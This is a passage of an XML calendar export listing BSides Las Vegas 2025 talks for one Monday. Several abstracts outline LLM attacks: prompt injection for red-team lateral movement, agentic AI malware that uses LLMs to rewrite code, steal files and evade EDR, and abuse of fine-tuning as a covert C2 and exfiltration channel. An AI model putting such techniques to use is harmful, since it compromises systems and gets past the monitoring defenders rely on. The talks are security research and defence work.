            <summary>Lunch Break, Monday</summary>
            <description>Lunch, Monday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/TTNWHR/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>99CFPY@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-99CFPY</pentabarf:event-slug>
            <pentabarf:title>Afternoon Talks, Monday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T140000</dtstart>
            <dtend></dtend>
            <duration>020000</duration>
            <summary>Afternoon Talks, Monday</summary>
            <description>Afternoon Talks, Monday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/99CFPY/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>ENKCZH@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-ENKCZH</pentabarf:event-slug>
            <pentabarf:title>PvJ CTF Play Ends, Monday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T160000</dtstart>
            <dtend></dtend>
            <duration>000000</duration>
            <summary>PvJ CTF Play Ends, Monday</summary>
            <description>PvJ CTF Play Ends, Monday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/ENKCZH/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>RZC7FH@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-RZC7FH</pentabarf:event-slug>
            <pentabarf:title>Happy Hour, Monday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T160000</dtstart>
            <dtend>20250804T170000</dtend>
            <duration>010000</duration>
            <summary>Happy Hour, Monday</summary>
            <description>Happy Hour, Monday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/RZC7FH/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>GH7XDX@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-GH7XDX</pentabarf:event-slug>
            <pentabarf:title>PvJ CTF Hotwash, Monday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T170000</dtstart>
            <dtend>20250804T173000</dtend>
            <duration>003000</duration>
            <summary>PvJ CTF Hotwash, Monday</summary>
            <description>PvJ Hotwash, Monday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/GH7XDX/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>GYHBD3@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-GYHBD3</pentabarf:event-slug>
            <pentabarf:title>Evening Talks, Monday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T170000</dtstart>
            <dtend>20250804T190000</dtend>
            <duration>020000</duration>
            <summary>Evening Talks, Monday</summary>
            <description>Evening Talks, Monday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/GYHBD3/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>JSGWHZ@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-JSGWHZ</pentabarf:event-slug>
            <pentabarf:title>Middle Ground Closes, Monday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T190000</dtstart>
            <dtend></dtend>
            <duration>000000</duration>
            <summary>Middle Ground Closes, Monday</summary>
            <description>Middle Ground Closes, Monday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/JSGWHZ/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>E7XWHB@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-E7XWHB</pentabarf:event-slug>
            <pentabarf:title>WhoAmI.exe - Can You Find The Threat?</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T190000</dtstart>
            <dtend>20250804T220000</dtend>
            <duration>030000</duration>
            <summary>WhoAmI.exe - Can You Find The Threat?</summary>
            <description>Welcome to a high-stakes game of deception, deduction, and discovery! In this thrilling mystery-style tabletop experience, players take on unique character roles within a large corporation. The main characters include the CEO, IT Technician, CISO, Senior Analyst, and the intern. Each character contains a profile that holds their own secrets, motives, and hidden agendas. As the tension builds, each group will work together, or scheme against each other, to uncover the insider threat before it’s too late.

Designed for 4-8 players per group, this immersive game challenges participants to analyze clues, interrogate suspects, and piece together the puzzle. Trust no one, question everything, and be prepared for unexpected twists, because in this game, the truth is never what it seems.

Do you have what it takes to unmask the insider?</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Training-4h</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/E7XWHB/</url>
            <location>Florentine C+D</location>
            
            <attendee>Reanna Schultz</attendee>
            
            <attendee>Joshua Mason</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>LTVBTF@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-LTVBTF</pentabarf:event-slug>
            <pentabarf:title>Silent Auction Closes, Monday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T190000</dtstart>
            <dtend>20250804T190000</dtend>
            <duration>000000</duration>
            <summary>Silent Auction Closes, Monday</summary>
            <description>Silent Auction Closes</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/LTVBTF/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>EKFALC@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-EKFALC</pentabarf:event-slug>
            <pentabarf:title>Board Game Night</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T190000</dtstart>
            <dtend>20250804T220000</dtend>
            <duration>030000</duration>
            <summary>Board Game Night</summary>
            <description>Board Game Night</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event2HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/EKFALC/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>FFUHZJ@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-FFUHZJ</pentabarf:event-slug>
            <pentabarf:title>BSLV Volunteer Reception</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T200000</dtstart>
            <dtend>20250804T220000</dtend>
            <duration>020000</duration>
            <summary>BSLV Volunteer Reception</summary>
            <description>BSLV Volunteer Reception</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event2HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/FFUHZJ/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>ZCMBVR@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-ZCMBVR</pentabarf:event-slug>
            <pentabarf:title>PvJ CTF Play Begins, Monday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T090000</dtstart>
            <dtend>20250804T090000</dtend>
            <duration>000000</duration>
            <summary>PvJ CTF Play Begins, Monday</summary>
            <description>PvJ CTF Play Begins, Monday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/ZCMBVR/</url>
            <location>Florentine E</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>9RELPE@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-9RELPE</pentabarf:event-slug>
            <pentabarf:title>Beyond the Breach: Why Your Tabletop Exercise Should be Your Worst Nightmare</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T100000</dtstart>
            <dtend>20250804T104500</dtend>
            <duration>004500</duration>
            <summary>Beyond the Breach: Why Your Tabletop Exercise Should be Your Worst Nightmare</summary>
            <description>Tabletop exercises are vital to the success of security within businesses, providing a simulated environment where teams can practice their responses to various scenarios. As someone who has written and conducted several of these exercises, I&#x27;ve observed common challenges that companies face during these sessions. One significant hurdle is the fear of failure; participants often worry about looking bad and are reluctant to embrace mistakes. However, I believe it&#x27;s important to teach people that failure is not only acceptable but can actually contribute to creating a more secure environment. By learning from errors made during tabletop exercises, teams can strengthen their strategies and improve their overall security posture. Embracing a mindset where failure is seen as a stepping stone to success can transform the way businesses approach security, making them more resilient and prepared for real-world threats.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/9RELPE/</url>
            <location>Florentine E</location>
            
            <attendee>Madison Rocha</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>HKSUYW@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-HKSUYW</pentabarf:event-slug>
            <pentabarf:title>Turbo Tactical Exploitation: 22 Tips for Tricky Targets</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T110000</dtstart>
            <dtend>20250804T112000</dtend>
            <duration>002000</duration>
            <summary>Turbo Tactical Exploitation: 22 Tips for Tricky Targets</summary>
            <description>Modern penetration testing is no longer about running one big scan and waiting for low-hanging fruit to drop. It’s about speed, precision, adaptability, and the ability to recognize opportunity from noise. The faster a red team can identify viable paths to privilege or data, the more time they have to focus on meaningful exploitation—and the more value they deliver.

This talk is built for speed. It’s a rapid-fire delivery of 22 tactical tips, designed for operators working against the clock and under pressure. Each tip targets a specific phase of a real-world engagement—covering everything from network recon to post-exploitation pivots—emphasizing tools, logic, and lateral thinking that yield fast results.

The techniques in this session are grounded in real-world experience from assessments where time is short and the environment is unknown. These aren’t theoretical tactics—they’re the battle-tested shortcuts and field-proven workflows that separate successful engagements from an empty report.

This session is for:
* Penetration testers looking to sharpen their time-to-impact
* Red teamers working inside constrained, high-pressure environments
* Blue teamers wanting to understand how attackers think and move
* Developers or sysadmins curious about how attackers prioritize and exploit their systems


The primary goal is to arm attendees with fast, effective methods for:
* Finding valuable targets with minimal noise
* Recognizing indirect indicators of vulnerable systems
* Pivoting across infrastructure and through segmentation
* Avoiding tool fatigue and maximizing signal-per-effort

This talk is structured as a guided sprint through the offensive lifecycle, starting from outside-in, to a foothold on an intermediate system, and finally to the most critical targets within the environment. Each tactic is immediately useful, often tool-agnostic, and focused on high leverage with low effort.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/HKSUYW/</url>
            <location>Florentine E</location>
            
            <attendee>HD Moore</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>T7AHQT@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-T7AHQT</pentabarf:event-slug>
            <pentabarf:title>Avoiding Credential Chaos: Authenticating With No Secrets</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T140000</dtstart>
            <dtend>20250804T144500</dtend>
            <duration>004500</duration>
            <summary>Avoiding Credential Chaos: Authenticating With No Secrets</summary>
            <description>Tired of the secret sprawl? You&#x27;re not alone. This talk throws out the outdated playbook of endless key rotations and credential tracking and exposes a better way: deleting the darn secrets in the first place. Or where they can’t be deleted, choose a solution that offers better protection as a matter of course. Learn concrete &#x27;Do This, Not That&#x27; guidance for reducing secrets-induced risk across your stack, from how your users access infrastructure to how your services themselves authenticate.

We’ll go through common use cases that traditionally require static, manually managed secrets, and give specific examples of how to move away from that model to a much safer and more maintainable architecture, where manually managed secrets are the exception, not the default.
See a live demonstration of two Kubernetes clusters – one in AWS and one in Azure – securely authenticating to the other cloud provider with zero manually managed secrets. We&#x27;ll dive into AWS IRSA and Azure Workload ID, showcasing how these services unlock cross-cloud access without the risk of static, privileged client credentials. You&#x27;ll even get the full Terraform source code to implement this yourself, highlighting the emergent wins for resiliency and maintainability when your entire infrastructure is defined in code.

Leave this session equipped with practical examples to immediately reduce your secrets footprint and a deeper understanding of building secure, secret-free systems.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/T7AHQT/</url>
            <location>Florentine E</location>
            
            <attendee>Chitra Dharmarajan</attendee>
            
            <attendee>Steve Jarvis</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>JJCREB@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-JJCREB</pentabarf:event-slug>
            <pentabarf:title>Hacking Secure Coding Into Education</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T150000</dtstart>
            <dtend>20250804T152000</dtend>
            <duration>002000</duration>
            <summary>Hacking Secure Coding Into Education</summary>
            <description>Join us as we share our journey bringing secure coding education to high school, university, and software engineering students. We’ll discuss the gaps in traditional programming education and how we addressed them through accessible, hands-on workshops. Discover our free GitHub repository and YouTube channel, packed with labs and walkthroughs. Learn how you can contribute—by suggesting ideas, building labs, reviewing code, or creating walkthrough videos—to help grow the secure coding community.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/JJCREB/</url>
            <location>Florentine E</location>
            
            <attendee>Or Sahar</attendee>
            
            <attendee>Yariv Tal</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>7BZSKL@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-7BZSKL</pentabarf:event-slug>
            <pentabarf:title>Casting Light on Shadow Cloud Deployments</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T153000</dtstart>
            <dtend>20250804T155000</dtend>
            <duration>002000</duration>
            <summary>Casting Light on Shadow Cloud Deployments</summary>
            <description>We developed this tool, and talk, after years of responding to incidents started from exposure of resources. The initial version supported AWS resource exposure investigation, and was presented at ShmooCon 2025. Since then, we are working on an integration of Google Cloud and increasing our coverage of AWS resources. This CLI tool has found success from practitioners in reducing the time spent during the identification phase of triage.

While other tools support similar features, Luminaut stands separate by focusing on the discovery of resources and leveraging an inside-out approach for detection. Luminaut starts by enumerating internet facing network interfaces, tracing them to attached resources and services to identify what components construct the network path. It then uses available audit history from sources like CloudTrail and AWS Config to provide available context on how the resources were created. In addition to the internal identification, Luminaut can use external resources to gather information about services running on the exposed interfaces. This includes using nmap, whatweb, and shodan to provide information on applications or frameworks available at the exposed ports.

Our project is available on GitHub here: https://github.com/luminaut-org/luminaut. In addition to the tool, our GitHub also hosts the documentation and our prior presentation slides. Our prior talk is available on YouTube here: https://youtu.be/-_jUZBMeU5w?si=e-Q3gFavTdhpecRY&amp;t=16700</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/7BZSKL/</url>
            <location>Florentine E</location>
            
            <attendee>Brittney Argirakis</attendee>
            
            <attendee>Chapin Bryce</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>8EDXNE@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-8EDXNE</pentabarf:event-slug>
            <pentabarf:title>Don&#x27;t be LLaMe - The basics of attacking LLMs in your Red Team exercises</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T170000</dtstart>
            <dtend>20250804T174500</dtend>
            <duration>004500</duration>
            <summary>Don&#x27;t be LLaMe - The basics of attacking LLMs in your Red Team exercises</summary>
            <description>While this discussion will cover the basics of LLMs themselves, the primary focus is on how they can be used in the course of other offensive security work - particularly Red Team engagements.

This presentation will begin with the core of how LLMs work at a theoretical level - no math or ML knowledge is required. Understanding how an LLM actually does what it does is critical to determining how to effectively manipulate or break it.

After establishing the basics, we will cover common prompt injection strategies informed by real-world exercises. The specific focus will be on achieving impactful objectives common to Red Team engagements, like lateral movement, privilege escalation, or impact - getting the LLM to say something dirty only to you isn&#x27;t exactly useful or concerning to the Red Team and falls into the alignment category, which is quality assurance more than offensive security.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/8EDXNE/</url>
            <location>Florentine E</location>
            
            <attendee>Brent Harrell</attendee>
            
            <attendee>Alex Bernier</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>HUP7L3@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-HUP7L3</pentabarf:event-slug>
            <pentabarf:title>.e&#x27;X&#x27;es and &#x27;O&#x27;auths (They Haunt Me): In-Depth Analysis of OAuth/OIDC Misconfigurations and Token Replay Attacks</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T180000</dtstart>
            <dtend>20250804T184500</dtend>
            <duration>004500</duration>
            <summary>.e&#x27;X&#x27;es and &#x27;O&#x27;auths (They Haunt Me): In-Depth Analysis of OAuth/OIDC Misconfigurations and Token Replay Attacks</summary>
            <description>OAuth 2.0 and OpenID Connect (OIDC) are the identity workhorses of the modern web, enabling SSO, delegated authorization, and secure API access across cloud and enterprise ecosystems. But despite their widespread adoption, these protocols are frequently misconfigured — and attackers are capitalizing on it. This talk exposes how real-world flaws in OAuth and OIDC implementations can be exploited to bypass authentication, impersonate users, and perform full session hijacking via token replay.
	This presentation is designed for security professionals, penetration testers, red teamers, and identity architects who want a deeper technical understanding of identity-layer attack surface and how it’s routinely exploited in the wild. It opens with a fast-paced breakdown of how OAuth and OIDC are supposed to work, then dives headfirst into where they typically fail — not in the protocols themselves, but in how they’re implemented.
	Attendees will learn how missing or improperly validated state parameters lead to CSRF, how weak or wildcarded redirect_uri values open the door for open redirect exploits, and why implicit flows are dangerous in modern environments. On the OIDC side, we’ll explore how attackers tamper with the discovery endpoint (.well-known/openid-configuration), and how improperly validated ID tokens lacking issuer, audience, or nonce verification can be forged and replayed.
	The centerpiece of the session is a live demonstration of a token replay attack using OWASP ZAP. We’ll walk through a simulated login against a vulnerable OAuth/OIDC web app, intercept a valid JWT using ZAP, and replay that token from another client to gain unauthorized access. This real-time attack sequence shows just how quickly identity misconfigurations can be turned into full session compromise — especially when token binding and validation safeguards are missing.
	Following the attack demonstration, we’ll pivot to practical defensive strategies including:

- Best practices for validating ID tokens (issuer, audience, nonce, exp)
- Enforcing short token lifetimes and secure refresh mechanisms
- Implementing token binding using device fingerprinting, IP correlation, or advanced options like DPoP and mTLS
- Integrating detection strategies via ITDR platforms or behavioral monitoring

	To support continued learning, the presentation includes access to an open-source lab environment built around OWASP ZAP. The lab includes three modular ZAP script sets:

Script Set 1: Hardcoded JWT replay automation
Script Set 2: Dynamic token capture and replay via scripted login
Script Set 3: Docker-based ZAP automation for CI/CD pipelines

	This session bridges the gap between protocol theory and real-world identity exploitation, showing how small implementation gaps can have catastrophic security consequences. Attendees will leave with working examples, reusable tools, and a detailed understanding of how to defend against identity-based attacks that bypass traditional perimeter defenses.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/HUP7L3/</url>
            <location>Florentine E</location>
            
            <attendee>Darryl G. Baker</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>ZRBTVS@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-ZRBTVS</pentabarf:event-slug>
            <pentabarf:title>Locking Hands: Ransomware Meets Bioimplants</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T100000</dtstart>
            <dtend>20250804T104500</dtend>
            <duration>004500</duration>
            <summary>Locking Hands: Ransomware Meets Bioimplants</summary>
            <description>Bioimplants like NFC chips unlock new possibilities for personal augmentation, but they also introduce unique security challenges. In this talk, we present LockSkin, the first educational ransomware designed specifically for NFC bioimplants. LockSkin adds a ransom note and secret key to the implant, leaving the user locked out of their own device. Through this hands-on experiment, we’ll explore the implications of bioimplant security, the mechanics of LockSkin, and what this means for the future of biohacking. Are you going to open that door? Grab that mic? Think twice. Because sometimes, ransomware really does get under your skin.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/ZRBTVS/</url>
            <location>Florentine F</location>
            
            <attendee>Mauro Eldritch / Heiner García Pérez</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>RESSKA@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-RESSKA</pentabarf:event-slug>
            <pentabarf:title>So You Want to Give A Talk: How to Write a CFP</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T110000</dtstart>
            <dtend>20250804T112000</dtend>
            <duration>002000</duration>
            <summary>So You Want to Give A Talk: How to Write a CFP</summary>
            <description>Wow, we let people potentially put in 8,000 words here? That&#x27;s like 16 pages!

Anyway, this is a talk I&#x27;ve given locally here in San Diego a few times and it&#x27;s been well received. I walk through the various sections of a CFP and how to fill them out, in a fun, lighthearted talk. The intent of this talk is to help newbies and the elite alike submit better CFPs. Also I noticed that last time BsidesLV had a CFP talk it was a panel from 2016.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/RESSKA/</url>
            <location>Florentine F</location>
            
            <attendee>Phil &quot;Soldier of FORTRAN&quot; Young</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>TJMRAK@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-TJMRAK</pentabarf:event-slug>
            <pentabarf:title>Agentic AI Malware: Why the Cybersecurity Battle Isn’t Over</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T140000</dtstart>
            <dtend>20250804T144500</dtend>
            <duration>004500</duration>
            <summary>Agentic AI Malware: Why the Cybersecurity Battle Isn’t Over</summary>
            <description>This talk will showcase an agentic AI agent demo that I created. The first version was built using Perplexity&#x27;s Sonar reasoning pro model, with an updated version leveraging OpenAI&#x27;s Responses API.
I will walk through each step and feature in detail, analyzing its effectiveness, potential benefits for attackers, implementation challenges, and whether it makes detection harder for defenders.
Key topics will include: Metamorphic code rewriting with LLMs, autonomous reasoning-based strategy selection to achieve goals such as stealing sensitive files, exfiltration via LLMs, and EDR evasion techniques.
The goal of this talk is to demonstrate what is realistically possible while cutting through media hype and misconceptions about so-called &quot;unlockable&quot; agentic AI malware.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/TJMRAK/</url>
            <location>Florentine F</location>
            
            <attendee>Candid Wuest</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>HA8P8U@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-HA8P8U</pentabarf:event-slug>
            <pentabarf:title>When the Breach Hits the Fan: Understanding Cyber Insurance</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T150000</dtstart>
            <dtend>20250804T154500</dtend>
            <duration>004500</duration>
            <summary>When the Breach Hits the Fan: Understanding Cyber Insurance</summary>
            <description>There are so many questions and concerns in the cybersecurity community about cyber insurance, how it works, why are there exclusions, how do we improve our rates, etc. Even learning about what benefits insurance has for you is something that is a great value. So really laying out what the heck cyber insurance is, what it does and doesn&#x27;t cover, how it can be a boon and benefit, and tips on how organizations should best engage and work with their insurance providers and brokers. Highlighted in the conversation is especially facts about how the claims process helps in some of the major challenges during a ransomware attack, how it can save you money during an incident, and assist with navigating coverage of 3rd party incidents too.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/HA8P8U/</url>
            <location>Florentine F</location>
            
            <attendee>Mea Clift</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>D8QXVT@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-D8QXVT</pentabarf:event-slug>
            <pentabarf:title>When Attackers Tune In: Weaponizing LLM Tuning for Stealthy C2 and Exfiltration</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T170000</dtstart>
            <dtend></dtend>
            <duration>002000</duration>
            <summary>When Attackers Tune In: Weaponizing LLM Tuning for Stealthy C2 and Exfiltration</summary>
            <description>In this presentation we will share a proof of concept we developed, originally as part of a data exfiltration focused research project held in Palo Alto’s Cortex TI team. 
As we mapped the landscape we found that Large Language Models (LLMs) are increasingly leveraged by attackers for automation, phishing, and malware development, but their true offensive potential remains largely untapped. 
In this talk, we explore a novel technique: abusing the fine-tuning process of LLMs to establish a covert C2 channel and exfiltrate sensitive data. Unlike traditional AI abuses that focus on prompt engineering or model manipulation, this approach enables adversaries to embed and retrieve information through the fine-tuning mechanism, bypassing common security measures.
At first glance, using LLMs for covert communication seems impractical due to security controls, session-based memory limitations, and unpredictable model behavior. However, by fine-tuning a widely used model, we successfully created a reliable attack method where a victim unknowingly trains an LLM with sensitive data, allowing an attacker to extract this data and issue commands remotely. We will showcase our PoC, highlighting key technical challenges such as AI hallucinations, consistency issues, and response unpredictability—along with the techniques we used to overcome them.
From a defender’s perspective, detecting this attack is quite challenging. Traditional security solutions, such as EDRs and network monitoring tools, do not effectively track AI interactions, allowing malicious activity to blend in with legitimate AI usage. We will analyze why conventional detection methods fail and discuss potential mitigation strategies, including behavioral anomaly detection.
